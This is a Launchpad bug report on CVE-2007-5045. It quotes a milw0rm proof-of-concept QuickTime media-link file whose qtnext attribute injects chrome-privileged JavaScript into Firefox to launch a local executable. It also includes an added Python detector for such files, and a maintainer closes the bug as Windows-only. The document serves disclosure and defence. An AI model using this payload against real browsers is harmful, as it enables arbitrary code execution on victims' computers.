Mozilla Firefox + QuickTime Command Execution

Bug #139258 reported by Kyle M Weller
Affects | Status | Importance | Assigned to | Milestone
firefox (Ubuntu) | Invalid | Undecided | Kees Cook |

Bug Description

Mozilla Firefox, Swiftfox, and other Mozilla browsers are affected
<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seems that QuickTime media formats can hack into Firefox.
The result of this vulnerability can lead to full compromise of
the browser and maybe even the underlying operating system.
Don't try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

# milw0rm.com [2007-09-12]
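
A defensive check for the pattern in the report above, as an added example that is not part of the original bug report or the milw0rm post: it scans QuickTime media link content for a `qtnext` value that begins with `-` or carries a `javascript:` URL. The function name and both sample files are constructed for illustration; regexes are used instead of an XML parser because the reported file has a malformed XML declaration.

```python
import re

# Processing instruction that marks QuickTime media link content.
MARKER_RE = re.compile(
    r"<\?quicktime\b[^>]*application/x-quicktime-media-link", re.IGNORECASE)
# qtnext="..." or qtnext='...'; the reported value nests single quotes
# inside double quotes, so each quote style is matched separately.
QTNEXT_RE = re.compile(
    r"""\bqtnext\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.IGNORECASE)
JS_SCHEME_RE = re.compile(r"\bjavascript\s*:", re.IGNORECASE)


def audit_media_link(text):
    """Return [(qtnext_value, [reasons])] for suspicious qtnext attributes."""
    findings = []
    if not MARKER_RE.search(text):
        return findings  # not QuickTime media link content
    for match in QTNEXT_RE.finditer(text):
        raw = match.group(1) if match.group(1) is not None else match.group(2)
        value = raw.strip()
        reasons = []
        if value.startswith("-"):
            reasons.append("begins with '-', so it reads as a command-line "
                           "option rather than a URL")
        if JS_SCHEME_RE.search(value):
            reasons.append("contains a javascript: URL")
        if reasons:
            findings.append((value, reasons))
    return findings


# Constructed samples: same structure as the report, harmless payload.
SUSPICIOUS = '''<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:void(0);"/>
'''
BENIGN = '''<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="http://media.example/b.mp3"/>
'''

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        for value, reasons in audit_media_link(sample):
            print(f"{name}: qtnext={value!r}")
            for reason in reasons:
                print(f"  - {reason}")
```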

Kees Cook (kees) wrote :

This is CVE-2007-5045. It does not affect Ubuntu -- it is a Windows-only problem.

Changed in firefox:
assignee: nobody → keescook
status: New → Invalid
This report contains Public Security information  
Everyone can see this security related information.
